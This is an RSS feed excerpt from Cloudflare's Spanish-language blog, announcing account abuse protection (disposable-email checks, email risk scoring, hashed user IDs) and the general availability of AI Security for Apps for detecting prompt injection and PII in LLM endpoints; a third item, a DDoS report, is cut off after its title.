
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/es-es/" rel="self" type="application/rss+xml"/>
        <language>es-es</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Sat, 04 Apr 2026 09:11:57 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Novedad: Protección contra el uso indebido de cuentas de Cloudflare | Evita los ataques fraudulentos de bots y de personas]]></title>
            <link>https://blog.cloudflare.com/es-es/account-abuse-protection/</link>
            <pubDate>Thu, 12 Mar 2026 05:00:00 GMT</pubDate>
            <description><![CDATA[ El bloqueo de bots ya no es suficiente. Las nuevas funciones de prevención del fraude de Cloudflare — ya disponibles en acceso anticipado — ayudan a evitar el uso indebido de cuentas antes de que ocurra. ]]></description>
            <content:encoded><![CDATA[ <p>Hoy, Cloudflare estrena un nuevo paquete de funciones para prevenir el fraude, diseñado para detener el uso indebido de cuentas antes de que ocurra. Llevamos años ayudando a los clientes de Cloudflare a proteger sus aplicaciones frente a los ataques automatizados, pero el panorama de amenazas ha cambiado. La industrialización de los ataques híbridos, que combinan medios automatizados y humanos, supone un complejo desafío de seguridad para los propietarios de sitios web. Pensemos, por ejemplo, en una única cuenta a la que se accede desde Nueva York, Londres y San Francisco en los mismos cinco minutos. La pregunta clave en este caso no es "¿se trata de un proceso automatizado?" sino más bien "¿es auténtico?". </p><p><b>Los propietarios de sitios web necesitan herramientas para poner fin a los usos indebidos en sus sitios web, independientemente de quién los cometa</b>.</p><p>Durante nuestra Semana aniversario en 2024, ofrecimos la <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>detección de credenciales filtradas</u></a> a todos los clientes, incluidos los que tienen un plan gratuito. Desde entonces, hemos incorporado <a href="https://developers.cloudflare.com/bots/additional-configurations/detection-ids/#account-takeover-detections"><u>identificadores de detección de apropiación de cuentas</u></a> como parte de nuestra <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>solución de gestión de bots</u></a> para ayudarte a identificar los bots que atacan tus páginas de inicio de sesión. </p><p>Ahora estamos combinando estas potentes herramientas con otras nuevas. La <b>verificación de correos electrónicos temporales</b> y la <b>gestión de riesgos de correo electrónico </b>te ayudan a aplicar las preferencias de seguridad para los usuarios que se registran con direcciones de correo temporales, una táctica habitual para crear cuentas falsas y abusar de las promociones, o cuyos correos se consideran de riesgo según los patrones de uso y la infraestructura. También nos alegra mucho presentar los <b>Id. de usuario con hash</b>, identificadores por dominio generados mediante el hash criptográfico de los nombres de usuario, que ofrecen a los clientes una mejor visión de la actividad sospechosa en las cuentas y una mayor capacidad para mitigar el tráfico potencialmente fraudulento, sin comprometer la privacidad del usuario final.</p><p><b>Las nuevas funciones que anunciamos hoy van más allá de la automatización, ya que detectan comportamientos abusivos e identidades de riesgo tanto entre usuarios humanos </b><i><b>como</b></i><b> entre bots. La </b><a href="https://developers.cloudflare.com/bots/account-abuse-protection/"><u>protección contra el uso indebido de cuentas</u></a> ya está disponible en acceso anticipado, y cualquier cliente de Bot Management del plan Enterprise puede usar estas funciones sin coste adicional durante un tiempo limitado, hasta que la prevención contra el fraude de Cloudflare esté disponible para todos a finales de este año. Si quieres saber más sobre esta función de acceso anticipado, <a href="https://www.cloudflare.com/lp/account-abuse-protection/"><u>regístrate aquí</u></a>.</p>
    <div>
      <h3>Las credenciales filtradas hacen que los inicios de sesión sean demasiado vulnerables</h3>
      <a href="#las-credenciales-filtradas-hacen-que-los-inicios-de-sesion-sean-demasiado-vulnerables">
        
      </a>
    </div>
    <p>El umbral para cometer fraudes es peligrosamente bajo, sobre todo con la disponibilidad de enormes conjuntos de datos y el acceso a herramientas automatizadas que permiten cometer fraudes en cuentas a gran escala. Los propietarios de sitios web no solo se enfrentan a hackers individuales, sino a un fraude a gran escala. El año pasado, destacamos que el <a href="https://blog.cloudflare.com/password-reuse-rampant-half-user-logins-compromised/"><u><b>41 % de los inicios de sesión en nuestra red se realiza con credenciales filtradas</b></u></a>. Esta cifra no ha hecho más que aumentar tras la revelación de una base de datos con <a href="https://cybernews.com/security/billions-credentials-exposed-infostealers-data-leak/"><u>16 000 millones de registros</u></a>, y desde entonces han salido a la luz numerosas filtraciones de gran repercusión. </p><p>Además, los usuarios reutilizan las contraseñas en varias plataformas, lo que significa que una sola filtración de hace años puede seguir dando acceso hoy en día a una cuenta de una tienda de gran valor o incluso a una cuenta bancaria. Nuestra función gratuita de <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/#leaked-credentials-fields"><u>comprobación de credenciales filtradas</u></a> comprueba si una contraseña se ha filtrado en una fuga de datos conocida de otro servicio o aplicación en Internet. Se trata de un servicio de comprobación de credenciales que preserva la privacidad y que ayuda a proteger a nuestros usuarios de credenciales en riesgo, lo que significa que Cloudflare realiza estas comprobaciones sin acceder ni almacenar las contraseñas de los usuarios finales en texto sin formato. <a href="https://blog.cloudflare.com/helping-keep-customers-safe-with-leaked-password-notification/#how-does-cloudflare-check-for-leaked-credentials"><u>Las contraseñas se someten a un proceso de hash, es decir, se convierten en una cadena aleatoria de caracteres mediante un algoritmo criptográfico, con el fin de compararlas con una base de datos de credenciales filtradas.</u></a> Si aún no has activado nuestra función <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/#leaked-credentials-fields"><u>comprobación de credenciales filtradas</u></a>, hazlo ahora para proteger tus cuentas de piratas informáticos.</p><p>El acceso a una gran base de datos de credenciales filtradas solo es útil si un atacante puede probarlas rápidamente en muchos sitios web para identificar qué cuentas siguen siendo vulnerables debido a la reutilización de contraseñas. En nuestro análisis del Black Friday de 2024, observamos que más del <a href="https://blog.cloudflare.com/grinch-bot-2024/"><u><b>60 % del tráfico hacia las páginas de inicio de sesión de nuestra red era automatizado</b></u></a>. Son muchos bots que intentan entrar.</p><p>Para ayudar a los clientes a proteger sus puntos de finales de acceso de inicio de sesión frente a los constantes ataques, hemos añadido <a href="https://www.cloudflare.com/learning/access-management/account-takeover/"><u>detecciones específicas</u></a> <a href="https://developers.cloudflare.com/bots/additional-configurations/detection-ids/account-takeover-detections/"><u>contra la apropiación de cuentas</u></a> (ATO) para señalar los patrones de tráfico sospechosos. Esto forma parte de nuestro enfoque reciente en las <a href="https://blog.cloudflare.com/per-customer-bot-defenses/"><u>detecciones por cliente</u></a>, en las que proporcionamos detección de anomalías de comportamiento únicas para cada cliente de nuestra solución de gestión de bots. Ahora, los clientes del servicio de gestión de bots pueden detectar y mitigar los intentos de ataques de ATO en sus solicitudes de inicio de sesión directamente en el panel de análisis de seguridad.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3f2nQ5wBVQ2WqiKGsjVWJe/3c1011ced84e46f65938f32c88035de9/image5.png" />
          </figure><p><i><sup>En la pestaña de la izquierda del panel de control de análisis de seguridad, puedes ver y abordar los intentos de usurpación de cuentas.</sup></i></p><p>En la última semana, nuestras detecciones combinadas de ATO detectaron una media de <b>6900 millones de intentos de inicio de sesión sospechosos</b> al día en toda nuestra red. Estas detecciones de ATO, junto con los muchos otros mecanismos de detección de nuestra solución de gestión de bots, crean una <i>defensa por capas</i> contra los ataques ATO y otros ataques maliciosos automatizados.</p>
    <div>
      <h3>De la automatización a la intención y la identidad</h3>
      <a href="#de-la-automatizacion-a-la-intencion-y-la-identidad">
        
      </a>
    </div>
    <p>¿Distinguir la automatización o distinguir la intención y la identidad? Esa es la cuestión. Nuestra respuesta: sí y sí, ya que ambas son capas fundamentales para una estrategia de seguridad sólida. Los atacantes operan ahora a una escala que antes solo veían los servicios empresariales. Aprovechan filtraciones masivas de credenciales, utilizan redes de fraude gestionadas por personas para suplantar dispositivos y ubicaciones, y crean identidades sintéticas para mantener miles, incluso millones, de cuentas falsas con fines promocionales y para abusar de las plataformas. Una persona que utilice herramientas automatizadas podría estar vaciando cuentas, abusando de las promociones, cometiendo fraude en los pagos o todo lo anterior.</p><p>Además, la automatización está más al alcance que nunca, sobre todo ahora que los usuarios se están acostumbrando cada vez más a usar <a href="https://www.cloudflare.com/learning/ai/what-is-agentic-ai/"><u>agentes de IA</u></a> e incluso los navegadores "tradicionales" de toda la vida están incorporando capacidades agénticas de forma predeterminada. Ya sea un individuo que utiliza un agente de IA o una campaña de fraude coordinada, la amenaza no se reduce a un simple script — puede implicar una intención humana, combinada con una ejecución automatizada.</p><p>Echa un vistazo a estas situaciones que nos han contado nuestros clientes:</p><ul><li><p>Tenemos 1000 usuarios nuevos este mes, pero más de la mitad de ellos son identidades falsas que se benefician de una prueba gratuita y luego desaparecen.</p></li><li><p>El atacante ha iniciado sesión con la contraseña correcta, así que, ¿cómo sé que no es el usuario real?</p></li><li><p>Esta entidad actúa a un ritmo normal, y están vaciando las cuentas.</p></li></ul><p>Estos problemas no se pueden resolver <i>solo</i> con la automatización, hay que comprobar también la autenticidad y la integridad. Esta es la carencia que nuestras soluciones especializadas en prevención del fraude buscan resolver.</p>
    <div>
      <h3>Cómo evaluar los correos electrónicos sospechosos</h3>
      <a href="#como-evaluar-los-correos-electronicos-sospechosos">
        
      </a>
    </div>
    <p>Empecemos por analizar el primer punto en el que podría producirse un uso indebido de la cuenta: la creación de la cuenta. La creación de cuentas falsas o en masa es uno de los temas más recurrentes en los debates sobre fraudes en sitios web, ya que puede abrir la puerta a que los atacantes accedan a una aplicación, o incluso a todo un modelo de negocio. </p><p>Cloudflare ofrece a sus clientes herramientas para detectar la creación de cuentas sospechosas desde el origen de dos maneras:</p><ol><li><p><b>Comprobación de correos electrónicos temporales</b>: detecta cuándo los usuarios se registran con direcciones de correo electrónico temporales, que suelen utilizarse para el spam y la creación de cuentas falsas. Estos servicios de correo electrónico temporal permiten a los atacantes crear miles de cuentas "únicas" sin necesidad de mantener una infraestructura real, sobre todo cuentas de correo temporales sin autenticación que ofrecen acceso inmediato sin necesidad de crear una cuenta, o alias de correo ilimitados y gratuitos. Los clientes pueden usar este campo binario cuando crean reglas para aplicar sus preferencias de seguridad, ya sea bloqueando directamente todos los correos electrónicos temporales o quizás solicitando una <a href="https://developers.cloudflare.com/cloudflare-challenges/challenge-types/"><u>verificación</u></a> a cualquiera que intente crear una cuenta con un correo electrónico temporal.
</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PQC7PqKWrhl5c4OCXu5Ha/9340e3b49cc396ca5f5d01d34fd529d5/image2.png" />
          </figure></li><li><p><b>Riesgo del correo electrónico:</b> Cloudflare analiza los patrones y la infraestructura del correo electrónico para establecer niveles de riesgo (bajo, medio, alto) que los clientes pueden utilizar en sus reglas de seguridad. Sabemos que no todas las direcciones de correo electrónico son iguales. Una dirección con el formato <code>firstname.lastname@knowndomain.com</code> presenta características de riesgo diferentes a las de <code>xk7q9m2p@newdomain.xyz</code>. Los niveles de riesgo por correo electrónico permiten a los clientes indicar su tolerancia al riesgo y a las complicaciones en el momento de crear la cuenta. </p></li></ol><p>Tanto la verificación de correo electrónico temporal como el riesgo de correo electrónico ya están disponibles en los análisis de seguridad y las reglas de seguridad, lo que permite a los propietarios de sitios web proteger el proceso de creación de cuentas. Estas detecciones abordan un problema fundamental. Cuando una cuenta ya está cometiendo abusos, ya es demasiado tarde. El propietario del sitio web ya ha pagado los costes de adquisición, el usuario fraudulento ha gastado los créditos promocionales y la solución del problema requiere una revisión manual. Para reducir el riesgo de los correos sospechosos, hay que añadir los controles adecuados en el momento del registro, que es cuando más importa.</p>
    <div>
      <h3>Novedad: Id. de usuario con hash</h3>
      <a href="#novedad-id-de-usuario-con-hash">
        
      </a>
    </div>
    <p>Comprender los patrones de abuso requiere <i>visibilidad</i>, no solo de la red, sino también de la actividad de la cuenta. Tradicionalmente, la seguridad ha consistido en analizar direcciones IP y solicitudes HTTP aisladas para detectar actividades automatizadas, pero los propietarios de sitios web no solo se fijan en las señales de red, también tienen en cuenta a sus usuarios y las cuentas conocidas. Por eso, estamos ampliando nuestro conjunto de herramientas de mitigación para que coincida con la forma en que se estructuran realmente las aplicaciones, centrándonos en la detección de la actividad fraudulenta basada en el usuario.</p><p>Los atacantes pueden cambiar de dirección IP sin ningún problema para borrar sus huellas. Sin embargo, obligarlos a crear una y otra vez cuentas nuevas y fiables genera un montón de problemas, sobre todo si se suma a las medidas de seguridad para la creación de cuentas. Si miramos más allá de la capa de red y relacionamos las acciones fraudulentas con una cuenta concreta que ha sido vulnerada o está siendo utilizada de forma abusiva, podemos detectar comportamientos selectivos vinculados a un único individuo persistente y poner fin al abuso. De esta forma, estamos cambiando la estrategia de defensa para centrarla en las cuentas, en lugar de jugar a un juego de nunca acabar con direcciones IP rotativas y proxies residenciales. Esto significa que <b>nuestros clientes pueden mitigar el comportamiento abusivo en función de la forma en que </b><i><b>sus</b></i><b> aplicaciones separan la identidad</b>.</p><p>Para que los propietarios de sitios web puedan aprovechar esta función, Cloudflare lanza un <a href="https://developers.cloudflare.com/bots/account-abuse-protection/#user-id"><u><b>Id. de usuario con hash</b></u></a> que los clientes pueden utilizar en <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>análisis de seguridad</u></a>, <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>reglas de seguridad</u></a> y <a href="https://developers.cloudflare.com/rules/transform/managed-transforms/reference/"><u>transformaciones gestionadas</u></a>. Los Id. de usuario son versiones con hash criptográfico, específicas para cada dominio, de los valores del campo "nombre de usuario", y cada Id. de usuario es un identificador cifrado, único y estable que se genera para un nombre de usuario concreto en la aplicación de un cliente. <b>Es importante destacar que Cloudflare no registra ni almacena el nombre de usuario real como parte de este servicio.</b> Al igual que con la comprobación de credenciales filtradas y la detección de ATO, que identifican el tráfico de inicio de sesión y luego encriptan las credenciales para compararlas, damos prioridad a la privacidad del usuario final al tiempo que permitimos a nuestros clientes tomar medidas contra los comportamientos fraudulentos.</p><p>Con el acceso a los Id. de usuario con hash, los propietarios de sitios web pueden:</p><ul><li><p>Ver los principales usuarios: ¿qué cuentas tienen más actividad?</p></li><li><p>Comprobar cuándo un usuario único inicia sesión desde un país en el que no suele hacerlo, ¡o desde varios países en un día!</p></li><li><p>Mitigar el tráfico basándose en usuarios únicos, como bloquear a un usuario con historial de actividad sospechosa.</p></li><li><p>Combinar campos para ver cuándo las cuentas están siendo objeto de ataque con credenciales robadas.</p></li><li><p>Consultar qué patrones o señales de red están asociados a usuarios únicos.</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3f7Jm4HnngjYEmKG8QSiyC/2ae3543f0cd0eb072a0c4c2bb12c4436/image4.png" />
          </figure><p><i><sup>Visualización ampliada de un único Id. de usuario cifrado en el panel de análisis de seguridad, que muestra los detalles de la actividad de ese usuario concreto, incluida su ubicación de inicio de sesión y su navegador. </sup></i></p><p>Esta visibilidad a nivel de usuario transforma la forma en que los propietarios de sitios web pueden investigar y mitigar el tráfico. En lugar de examinar las solicitudes individuales de forma aislada, nuestros clientes pueden ver el panorama completo de cómo los atacantes se dirigen y se esconden entre los usuarios legítimos.</p>
    <div>
      <h3>Anímate a proteger tu cuenta hoy mismo</h3>
      <a href="#animate-a-proteger-tu-cuenta-hoy-mismo">
        
      </a>
    </div>
    <p>Si quieres saber más sobre esta función de acceso anticipado, <a href="https://www.cloudflare.com/lp/account-abuse-protection/"><u>regístrate aquí</u></a>. Todos los clientes de Bot Management en el plan Enterprise pueden activar estas nuevas funciones de protección contra el uso indebido de cuentas desde hoy mismo, y nos encantaría hablar con todos y cada uno de los <a href="http://www.cloudflare.com/lp/account-abuse-protection"><u>posibles clientes de Bot Management</u></a>.</p><p>Si bien la detección de bots seguirá abordando la cuestión de la automatización y la intención, la detección de fraudes se centra en la cuestión de la autenticidad. Juntos, ofrecen a los propietarios de sitios web herramientas completas para luchar contra todo tipo de abusos en las cuentas. Este paquete forma parte de nuestra inversión continua para proteger todo el recorrido del usuario, desde la creación de la cuenta y el inicio de sesión hasta los procesos de pago seguros y la integridad de cada interacción.</p> ]]></content:encoded>
            <category><![CDATA[Fraude]]></category>
            <category><![CDATA[Seguridad]]></category>
            <guid isPermaLink="false">3oZLDQYiufcZZYvGXwxpKd</guid>
            <dc:creator>Jin-Hee Lee</dc:creator>
        </item>
        <item>
            <title><![CDATA[AI Security for Apps ya está disponible para todos]]></title>
            <link>https://blog.cloudflare.com/es-es/ai-security-for-apps-ga/</link>
            <pubDate>Wed, 11 Mar 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare AI Security for Apps ya está disponible para todos, y ofrece una capa de seguridad para detectar y proteger aplicaciones basadas en IA, independientemente del modelo o del proveedor de alojamiento. Además, vamos a ofrecer el servicio de detección de IA de forma gratuita en todos los planes, para ayudar a los equipos a identificar y proteger las implementaciones de Shadow AI. ]]></description>
            <content:encoded><![CDATA[ <p>La solución <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>AI Security for Apps</u></a> de Cloudflare detecta y mitiga las amenazas a las aplicaciones con IA. Hoy queremos anunciar que ya está disponible para todos.</p><p>Hemos añadido nuevas funciones, como la detección de temas personalizados, y ahora el servicio de detección de puntos finales que utilizan IA es gratuito para todos los clientes de Cloudflare — incluidos aquellos con planes gratuito, Pro y Business — para que todos puedan ver dónde está implementada la IA en sus aplicaciones conectadas a Internet.</p><p>También anunciamos una mayor colaboración con IBM, que ha elegido a Cloudflare para ofrecer seguridad basada en IA a sus clientes de servicios en la nube. Además, nos hemos asociado con Wiz para ofrecer a nuestros clientes comunes una visión global de su estado de seguridad basada en IA.</p>
    <div>
      <h2>Un nuevo tipo de superficie de ataque</h2>
      <a href="#un-nuevo-tipo-de-superficie-de-ataque">
        
      </a>
    </div>
    <p>Las aplicaciones web tradicionales tienen operaciones definidas, como consultar el saldo bancario o hacer una transferencia. Puedes escribir reglas determinadas para proteger esas interacciones. </p><p>Las aplicaciones y los agentes basados en IA son diferentes. Aceptan el lenguaje natural y generan respuestas impredecibles. No hay un conjunto fijo de operaciones para permitir o denegar, porque los datos de entrada y los resultados son probabilidades. Los atacantes pueden manipular los modelos de lenguaje de gran tamaño (LLM) para realizar acciones no autorizadas o filtrar datos confidenciales. La inyección de instrucciones, la divulgación de información confidencial y el consumo ilimitado son solo algunos de los riesgos que figuran en la lista de los <a href="https://genai.owasp.org/llm-top-10/"><u>10 principales riesgos de OWASP para aplicaciones de LLM</u></a>.</p><p>Estos riesgos aumentan a medida que las aplicaciones de IA se convierten en agentes. Cuando una herramienta de IA tiene acceso a operaciones en las que se procesan reembolsos, se modifican cuentas, se aplican descuentos o se accede a datos de clientes, una sola instrucción maliciosa se convierte inmediatamente en un incidente de seguridad.</p><p>Los clientes nos cuentan a qué se enfrentan. "La mayoría de los equipos de Newfold Digital están implementando sus propias medidas de seguridad para la IA generativa, pero todo el mundo está innovando tan rápido que, tarde o temprano, es inevitable que surjan algunas deficiencias", afirma Rick Radinger, arquitecto principal de sistemas en Newfold Digital, que opera Bluehost, HostGator y Domain.com. </p>
    <div>
      <h2>Qué hace AI Security for Apps</h2>
      <a href="#que-hace-ai-security-for-apps">
        
      </a>
    </div>
    <p>Hemos creado AI Security for Apps para solucionarlo. Se integra con tus aplicaciones basadas en IA, tanto si utilizas un modelo de terceros como si alojas el tuyo propio, como parte del <a href="https://www.cloudflare.com/learning/cdn/glossary/reverse-proxy/"><u>proxy inverso</u></a> de Cloudflare. Te ayuda a (1) detectar aplicaciones basadas en IA en tu propiedad web, (2) detectar comportamientos maliciosos o fuera de la política en esos puntos finales, y (3) mitigar las amenazas mediante el conocido creador de reglas WAF. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xpmckBUupzELjYOSx5bAF/cace1ab2ed2dd54d8d7a7ff60587ef65/BLOG-3128_2.png" />
          </figure>
    <div>
      <h3>Discovery, ¡ya es gratis para todos!</h3>
      <a href="#discovery-ya-es-gratis-para-todos">
        
      </a>
    </div>
    <p>Antes de que puedas proteger tus aplicaciones basadas en LLM, debes saber dónde se utilizan. A menudo, los equipos de seguridad nos comentan que no tienen una visión completa de las implementaciones de IA en sus aplicaciones, sobre todo ahora que el mercado de los LLM está en constante evolución y los desarrolladores van cambiando de modelos y proveedores. </p><p>AI Security for Apps identifica automáticamente los puntos finales basados en LLM en tus propiedades web, independientemente de dónde estén alojados o de cuál sea el modelo. A partir de hoy, esta función es gratuita para todos los clientes de Cloudflare, incluidos aquellos con planes gratuito, Pro y Business. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2dBKhU5VNbzAePDAnaHkTK/3f6a569e495e03c3e2afca4d6183e02d/image4.png" />
          </figure><p><i><sup>Página del panel de control de Cloudflare con los activos web, en la que se muestran dos puntos finales de ejemplo etiquetados como </sup></i><i><sup><code>cf-llm</code></sup></i></p><p>La detección automática de estos puntos finales requiere algo más que la coincidencia de patrones de ruta comunes como <code>/chat/completions</code>. Muchas aplicaciones basadas en IA no tienen una interfaz de chat. Piensa, por ejemplo, en la búsqueda de productos, las herramientas de valoración inmobiliaria o los motores de recomendación. Hemos desarrollado un <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#discovering-llm-powered-applications"><u>sistema de detección que analiza cómo se comportan los puntos finales</u></a>, no cómo se llaman. Para identificar con confianza los puntos finales que utilizan IA, se requiere <a href="https://developers.cloudflare.com/api-shield/security/api-discovery/#requirements"><u>suficiente tráfico válido</u></a>.</p><p>Los puntos finales que utilizan IA que se hayan detectado serán visibles en <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets"><u>Seguridad → Activos web</u></a>, etiquetados como <code>cf-llm</code>. Para los clientes con el plan gratuito, la detección de puntos finales se inicia la primera vez que accedes a la <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/web-assets/discovery"><u>página Discovery</u></a>. Para los clientes con un plan de pago, la detección se produce automáticamente en segundo plano de forma recurrente. Si se han detectado puntos finales basados en IA, puedes revisarlos inmediatamente.</p>
    <div>
      <h3>Detección</h3>
      <a href="#deteccion">
        
      </a>
    </div>
    <p>Las detecciones de AI Security for Apps siguen el enfoque <a href="https://developers.cloudflare.com/waf/detections/"><u>siempre activo</u></a> para el tráfico a tus puntos finales que usan IA. Cada instrucción se ejecuta a través de varios módulos de detección para la inyección de instrucciones, la exposición de información de identificación personal y temas sensibles o tóxicos. Los resultados — ya sea que la instrucción fuera maliciosa o no — se adjuntan como metadatos que puedes usar en reglas WAF personalizadas para aplicar tus políticas. Buscamos constantemente formas de aprovechar nuestra red global, que registra el tráfico de aproximadamente el <a href="https://w3techs.com/technologies/history_overview/proxy/all"><u>20 % de la web</u></a>, para detectar nuevos patrones de ataque en millones de sitios web antes de que lleguen al tuyo.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oGjcaUL5L9zlAkz8lSmXv/4354a9555135e19de5c93d3d113e6790/BLOG-3128_4.png" />
          </figure>
    <div>
      <h4>Disponibilidad general: Detección de temas personalizados</h4>
      <a href="#disponibilidad-general-deteccion-de-temas-personalizados">
        
      </a>
    </div>
    <p>El producto incluye detección integrada de amenazas comunes: inyecciones de instrucciones, <a href="https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/#detecting-prompts-designed-to-leak-pii"><u>extracción de información de identificación personal</u></a> y <a href="https://blog.cloudflare.com/block-unsafe-llm-prompts-with-firewall-for-ai/"><u>temas peligrosos</u></a>. Sin embargo, cada empresa tiene su propia definición de lo que está prohibido. Una empresa de servicios financieros podría necesitar detectar conversaciones sobre valores específicos. Una empresa del sector sanitario podría necesitar marcar las conversaciones que traten sobre datos de pacientes. Un minorista puede querer saber cuándo los clientes preguntan por productos de la competencia.</p><p>La nueva función de temas personalizados te permite definir estas categorías. Tú especificas el tema, nosotros inspeccionamos la instrucción y emitimos una puntuación de relevancia que puedes utilizar para registrar, bloquear o gestionar como prefieras. Nuestro objetivo es crear una herramienta adaptable que se ajuste a tus necesidades.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1WzPhy11ZmUXDGZjft4sY1/7ebfafaf2114eaba83a829694837fc2c/image1.png" />
          </figure><p><i><sup>Puntuación de relevancia de la Instrucción dentro de AI Security for Apps</sup></i></p>
    <div>
      <h4>Disponibilidad general: Extracción de instrucciones personalizadas</h4>
      <a href="#disponibilidad-general-extraccion-de-instrucciones-personalizadas">
        
      </a>
    </div>
    <p>AI Security for Apps aplica medidas de seguridad antes de que las instrucciones no seguras puedan llegar a tu infraestructura. Para ejecutar las detecciones con precisión y proporcionar protección en tiempo real, primero debemos identificar las instrucciones dentro de la carga malintencionada de la solicitud. Las instrucciones pueden estar en cualquier lugar del cuerpo de una solicitud, y los diferentes proveedores de LLM estructuran sus API de forma diferente. OpenAI y la mayoría de los proveedores utilizan <code>$.messages[*].content</code> para las sugerencias de chat. La API por lotes de Anthropic integra las solicitudes dentro de <code>$.requests[*].params.messages[*].content</code>. Tu herramienta de valoración de propiedades personalizada podría utilizar <code>$.property_description</code>.</p><p>Desde el primer momento, admitimos los formatos estándar utilizados por OpenAI, Anthropic, Google Gemini, Mistral, Cohere, xAI, DeepSeek, entre otros. Cuando no podemos hacer coincidir un patrón conocido, aplicamos una postura segura por defecto y ejecutamos la detección en todo el cuerpo de la solicitud. Si la carga malintencionada contiene campos que son sensibles pero que no se envían directamente a un modelo de IA, esto puede provocar falsos positivos. Por ejemplo, un campo como <code>$customer_name</code> junto con la indicación real podría activar la detección de datos de identificación personal de forma innecesaria.</p><p>En breve, podrás definir tus propias expresiones JSONPath para indicarnos exactamente dónde encontrar la instrucción. De este modo, se reducirán los falsos positivos y las detecciones serán más precisas. También estamos desarrollando una función de aprendizaje de instrucciones que se adaptará automáticamente a la estructura de tu aplicación con el tiempo.</p>
    <div>
      <h3>Mitigación</h3>
      <a href="#mitigacion">
        
      </a>
    </div>
    <p>Una vez identificada y puntuada una amenaza, puedes bloquearla, registrarla o proporcionar respuestas personalizadas, utilizando el mismo motor de reglas WAF que ya utilizas para el resto de la seguridad de tus aplicaciones. La eficacia de la plataforma compartida de Cloudflare es que puedes combinar señales específicas de la IA con todo lo demás que sabemos sobre una solicitud, representado por <a href="https://developers.cloudflare.com/ruleset-engine/rules-language/fields/reference/"><u>cientos de campos</u></a> disponibles en el WAF. Un intento de inyección de instrucciones es sospechoso. Pero que una dirección IP que ha estado investigando tu página de inicio de sesión intente inyectar código de forma inmediata, utilizando una huella digital del navegador relacionada con ataques anteriores y rotando a través de una red de bots, eso ya es otra historia. Las soluciones específicas que solo ven la capa de IA no pueden hacer estas conexiones.</p><p>Esta capa de seguridad unificada es exactamente lo que necesitan en Newfold Digital para detectar, etiquetar y proteger los puntos finales de IA, afirma Radinger: "Estamos deseando usarla en todos estos proyectos para que nos sirva de medida de seguridad".</p>
    <div>
      <h2>Ecosistema en crecimiento</h2>
      <a href="#ecosistema-en-crecimiento">
        
      </a>
    </div>
    <p>AI Security for Apps también estará disponible a través del cada vez más amplio ecosistema de Cloudflare, incluida la integración con IBM Cloud. A través de <a href="https://www.ibm.com/products/cloud-internet-services"><u>IBM Cloud Internet Services (CIS)</u></a>, los usuarios finales ya pueden adquirir soluciones avanzadas de seguridad de aplicaciones y gestionarlas directamente a través de su cuenta de IBM Cloud. </p><p>También nos asociamos con Wiz para conectar AI Security for Apps con <a href="https://www.wiz.io/solutions/ai-spm"><u>Wiz AI Security</u></a>, lo que ofrece a nuestros clientes comunes una visión unificada de su estado de seguridad en materia de IA, desde la detección de modelos y agentes en la nube hasta las medidas de protección en la capa de aplicaciones en el perímetro.</p>
    <div>
      <h2>Cómo empezar</h2>
      <a href="#como-empezar">
        
      </a>
    </div>
    <p>AI Security for Apps ya está disponible para los clientes Enterprise de Cloudflare. Ponte en contacto con tu equipo de cuenta para empezar, o comprueba cómo funciona el producto con una <a href="https://www.cloudflare.com/demos/protect-ai-apps/"><u>visita autoguiada</u></a>.</p><p>Si tienes un plan gratuito, Pro o Business, puedes usar la detección de puntos finales de IA hoy mismo. Inicia sesión en tu panel de control y ve a <b>Seguridad → Activos web</b> para ver qué puntos finales hemos identificado. ¡Atentos! Pronto pondremos a disposición de los clientes de todos los planes todas las funciones de "AI Security for Apps".</p><p>Para obtener más información sobre la configuración, consulta nuestra <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentación</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Seguridad de aplicaciones]]></category>
            <category><![CDATA[Servicios de aplicación]]></category>
            <guid isPermaLink="false">4MBDCV6FV61Xbyav3cW8Xy</guid>
            <dc:creator>Liam Reese</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Catherine Newcomb</dc:creator>
        </item>
        <item>
            <title><![CDATA[Informe sobre las amenazas DDoS en el 4.º trimestre de 2025: un ataque sin precedentes de 31,4 Tb/s culmina un año de ataques DDoS masivos]]></title>
            <link>https://blog.cloudflare.com/es-es/ddos-threat-report-2025-q4/</link>
            <pubDate>Thu, 05 Feb 2026 14:00:00 GMT</pubDate>
